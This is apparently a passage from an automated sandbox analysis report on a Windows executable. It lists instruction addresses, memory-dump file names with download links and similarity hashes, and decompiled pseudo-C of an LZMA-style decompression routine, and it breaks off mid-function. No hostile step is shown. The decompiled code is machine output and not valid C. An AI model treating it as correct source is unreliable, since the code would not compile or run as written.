                                                                                                                        0x0040685b
                                                                                                                        0x0040685b
                                                                                                                        0x00000000
                                                                                                                        0x0040685b
                                                                                                                        0x0040682a
                                                                                                                        0x0040682d
                                                                                                                        0x00406830
                                                                                                                        0x00406833
                                                                                                                        0x0040683a
                                                                                                                        0x0040677e
                                                                                                                        0x0040677e
                                                                                                                        0x00406781
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406915
                                                                                                                        0x00406918
                                                                                                                        0x00406819
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040654f
                                                                                                                        0x00406551
                                                                                                                        0x00406558
                                                                                                                        0x00406559
                                                                                                                        0x0040655b
                                                                                                                        0x0040655e
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406566
                                                                                                                        0x00406569
                                                                                                                        0x0040656c
                                                                                                                        0x0040656e
                                                                                                                        0x00406570
                                                                                                                        0x00406570
                                                                                                                        0x00406571
                                                                                                                        0x00406574
                                                                                                                        0x0040657b
                                                                                                                        0x0040657e
                                                                                                                        0x0040658c
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406862
                                                                                                                        0x00406862
                                                                                                                        0x00406865
                                                                                                                        0x0040686c
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406871
                                                                                                                        0x00406871
                                                                                                                        0x00406875
                                                                                                                        0x004069ad
                                                                                                                        0x00000000
                                                                                                                        0x004069ad
                                                                                                                        0x0040687b
                                                                                                                        0x0040687e
                                                                                                                        0x00406881
                                                                                                                        0x00406885
                                                                                                                        0x00406888
                                                                                                                        0x0040688e
                                                                                                                        0x00406890
                                                                                                                        0x00406890
                                                                                                                        0x00406890
                                                                                                                        0x00406893
                                                                                                                        0x00406896
                                                                                                                        0x00406896
                                                                                                                        0x00406896
                                                                                                                        0x00406896
                                                                                                                        0x00406899
                                                                                                                        0x00406899
                                                                                                                        0x0040689d
                                                                                                                        0x004068fd
                                                                                                                        0x00406900
                                                                                                                        0x00406905
                                                                                                                        0x00406906
                                                                                                                        0x00406908
                                                                                                                        0x0040690a
                                                                                                                        0x0040690d
                                                                                                                        0x00406819
                                                                                                                        0x00406819
                                                                                                                        0x00000000
                                                                                                                        0x0040681f
                                                                                                                        0x00406819
                                                                                                                        0x0040689f
                                                                                                                        0x004068a5
                                                                                                                        0x004068a8
                                                                                                                        0x004068ab
                                                                                                                        0x004068ae
                                                                                                                        0x004068b1
                                                                                                                        0x004068b4
                                                                                                                        0x004068b7
                                                                                                                        0x004068ba
                                                                                                                        0x004068bd
                                                                                                                        0x004068c0
                                                                                                                        0x004068d9
                                                                                                                        0x004068dc
                                                                                                                        0x004068df
                                                                                                                        0x004068e2
                                                                                                                        0x004068e6
                                                                                                                        0x004068e8
                                                                                                                        0x004068e8
                                                                                                                        0x004068e9
                                                                                                                        0x004068ec
                                                                                                                        0x004068c2
                                                                                                                        0x004068c2
                                                                                                                        0x004068ca
                                                                                                                        0x004068cf
                                                                                                                        0x004068d1
                                                                                                                        0x004068d4
                                                                                                                        0x004068d4
                                                                                                                        0x004068ef
                                                                                                                        0x004068f6
                                                                                                                        0x00000000
                                                                                                                        0x004068f8
                                                                                                                        0x00000000
                                                                                                                        0x004068f8
                                                                                                                        0x00000000
                                                                                                                        0x00406594
                                                                                                                        0x00406597
                                                                                                                        0x004065cd
                                                                                                                        0x004066fd
                                                                                                                        0x004066fd
                                                                                                                        0x004066fd
                                                                                                                        0x004066fd
                                                                                                                        0x00406700
                                                                                                                        0x00406700
                                                                                                                        0x00406703
                                                                                                                        0x00406705
                                                                                                                        0x0040698f
                                                                                                                        0x00000000
                                                                                                                        0x0040698f
                                                                                                                        0x0040670b
                                                                                                                        0x0040670e
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406714
                                                                                                                        0x00406718
                                                                                                                        0x0040671b
                                                                                                                        0x0040671b
                                                                                                                        0x0040671b
                                                                                                                        0x00000000
                                                                                                                        0x0040671b
                                                                                                                        0x00406599
                                                                                                                        0x0040659b
                                                                                                                        0x0040659d
                                                                                                                        0x0040659f
                                                                                                                        0x004065a2
                                                                                                                        0x004065a3
                                                                                                                        0x004065a5
                                                                                                                        0x004065a7
                                                                                                                        0x004065aa
                                                                                                                        0x004065ad
                                                                                                                        0x004065c3
                                                                                                                        0x004065c8
                                                                                                                        0x00406600
                                                                                                                        0x00406600
                                                                                                                        0x00406604
                                                                                                                        0x00406630
                                                                                                                        0x00406632
                                                                                                                        0x00406639
                                                                                                                        0x0040663c
                                                                                                                        0x0040663f
                                                                                                                        0x0040663f
                                                                                                                        0x00406644
                                                                                                                        0x00406644
                                                                                                                        0x00406646
                                                                                                                        0x00406649
                                                                                                                        0x00406650
                                                                                                                        0x00406653
                                                                                                                        0x00406680
                                                                                                                        0x00406680
                                                                                                                        0x00406683
                                                                                                                        0x00406686
                                                                                                                        0x004066fa
                                                                                                                        0x004066fa
                                                                                                                        0x004066fa
                                                                                                                        0x00000000
                                                                                                                        0x004066fa
                                                                                                                        0x00406688
                                                                                                                        0x0040668e
                                                                                                                        0x00406691
                                                                                                                        0x00406694
                                                                                                                        0x00406697
                                                                                                                        0x0040669a
                                                                                                                        0x0040669d
                                                                                                                        0x004066a0
                                                                                                                        0x004066a3
                                                                                                                        0x004066a6
                                                                                                                        0x004066a9
                                                                                                                        0x004066c2
                                                                                                                        0x004066c4
                                                                                                                        0x004066c7
                                                                                                                        0x004066c8
                                                                                                                        0x004066cb
                                                                                                                        0x004066cd
                                                                                                                        0x004066d0
                                                                                                                        0x004066d2
                                                                                                                        0x004066d4
                                                                                                                        0x004066d7
                                                                                                                        0x004066d9
                                                                                                                        0x004066dc
                                                                                                                        0x004066e0
                                                                                                                        0x004066e2
                                                                                                                        0x004066e2
                                                                                                                        0x004066e3
                                                                                                                        0x004066e6
                                                                                                                        0x004066e9
                                                                                                                        0x004066ab
                                                                                                                        0x004066ab
                                                                                                                        0x004066b3
                                                                                                                        0x004066b8
                                                                                                                        0x004066ba
                                                                                                                        0x004066bd
                                                                                                                        0x004066bd
                                                                                                                        0x004066ec
                                                                                                                        0x004066f3
                                                                                                                        0x0040667d
                                                                                                                        0x0040667d
                                                                                                                        0x0040667d
                                                                                                                        0x0040667d
                                                                                                                        0x00000000
                                                                                                                        0x004066f5
                                                                                                                        0x00000000
                                                                                                                        0x004066f5
                                                                                                                        0x004066f3
                                                                                                                        0x00406606
                                                                                                                        0x00406609
                                                                                                                        0x0040660b
                                                                                                                        0x0040660e
                                                                                                                        0x00406611
                                                                                                                        0x00406614
                                                                                                                        0x00406616
                                                                                                                        0x00406619
                                                                                                                        0x0040661c
                                                                                                                        0x0040661c
                                                                                                                        0x0040661f
                                                                                                                        0x0040661f
                                                                                                                        0x00406622
                                                                                                                        0x00406629
                                                                                                                        0x004065fd
                                                                                                                        0x004065fd
                                                                                                                        0x004065fd
                                                                                                                        0x004065fd
                                                                                                                        0x00000000
                                                                                                                        0x0040662b
                                                                                                                        0x00000000
                                                                                                                        0x0040662b
                                                                                                                        0x00406629
                                                                                                                        0x004065af
                                                                                                                        0x004065b2
                                                                                                                        0x004065b4
                                                                                                                        0x004065b7
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406316
                                                                                                                        0x00406316
                                                                                                                        0x0040631a
                                                                                                                        0x0040695f
                                                                                                                        0x00000000
                                                                                                                        0x0040695f
                                                                                                                        0x00406320
                                                                                                                        0x00406323
                                                                                                                        0x00406326
                                                                                                                        0x00406329
                                                                                                                        0x0040632c
                                                                                                                        0x0040632f
                                                                                                                        0x00406332
                                                                                                                        0x00406334
                                                                                                                        0x00406337
                                                                                                                        0x0040633a
                                                                                                                        0x0040633d
                                                                                                                        0x0040633f
                                                                                                                        0x0040633f
                                                                                                                        0x0040633f
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004064a1
                                                                                                                        0x004064a1
                                                                                                                        0x004064a5
                                                                                                                        0x0040696b
                                                                                                                        0x00000000
                                                                                                                        0x0040696b
                                                                                                                        0x004064ab
                                                                                                                        0x004064ae
                                                                                                                        0x004064b1
                                                                                                                        0x004064b4
                                                                                                                        0x004064b6
                                                                                                                        0x004064b6
                                                                                                                        0x004064b6
                                                                                                                        0x004064b9
                                                                                                                        0x004064bc
                                                                                                                        0x004064bf
                                                                                                                        0x004064c2
                                                                                                                        0x004064c5
                                                                                                                        0x004064c8
                                                                                                                        0x004064c9
                                                                                                                        0x004064cb
                                                                                                                        0x004064cb
                                                                                                                        0x004064cb
                                                                                                                        0x004064ce
                                                                                                                        0x004064d1
                                                                                                                        0x004064d4
                                                                                                                        0x004064d7
                                                                                                                        0x004064d7
                                                                                                                        0x004064d7
                                                                                                                        0x004064da
                                                                                                                        0x004064dc
                                                                                                                        0x004064dc
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040671e
                                                                                                                        0x0040671e
                                                                                                                        0x0040671e
                                                                                                                        0x00406722
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406728
                                                                                                                        0x0040672b
                                                                                                                        0x0040672e
                                                                                                                        0x00406731
                                                                                                                        0x00406733
                                                                                                                        0x00406733
                                                                                                                        0x00406733
                                                                                                                        0x00406736
                                                                                                                        0x00406739
                                                                                                                        0x0040673c
                                                                                                                        0x0040673f
                                                                                                                        0x00406742
                                                                                                                        0x00406745
                                                                                                                        0x00406746
                                                                                                                        0x00406748
                                                                                                                        0x00406748
                                                                                                                        0x00406748
                                                                                                                        0x0040674b
                                                                                                                        0x0040674e
                                                                                                                        0x00406751
                                                                                                                        0x00406754
                                                                                                                        0x00406757
                                                                                                                        0x0040675b
                                                                                                                        0x0040675d
                                                                                                                        0x00406760
                                                                                                                        0x00000000
                                                                                                                        0x00406762
                                                                                                                        0x004064df
                                                                                                                        0x004064df
                                                                                                                        0x00000000
                                                                                                                        0x004064df
                                                                                                                        0x00406760
                                                                                                                        0x00406995
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00405fc4
                                                                                                                        0x004069cc
                                                                                                                        0x004069cc
                                                                                                                        0x00000000
                                                                                                                        0x004069cc
                                                                                                                        0x00406819
                                                                                                                        0x004067a0
                                                                                                                        0x0040679d
                                                                                                                        0x00000000
                                                                                                                        0x004064f2

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 55b1e8378e3b2d282ecc9e99db2cbf184c75cfe722202a43e2005f386b139382
                                                                                                                        • Instruction ID: 067b91939e33353516387f96afd3df60e22fb0a2a23546be1218d687de4ca84d
                                                                                                                        • Opcode Fuzzy Hash: 55b1e8378e3b2d282ecc9e99db2cbf184c75cfe722202a43e2005f386b139382
                                                                                                                        • Instruction Fuzzy Hash: 14715371E00229CFEF28CF98C844BADBBB1FB44305F15816AD816BB281C7799996DF54
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040643A, Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 98%
                                                                                                                        			E0040643A() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004069D4))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
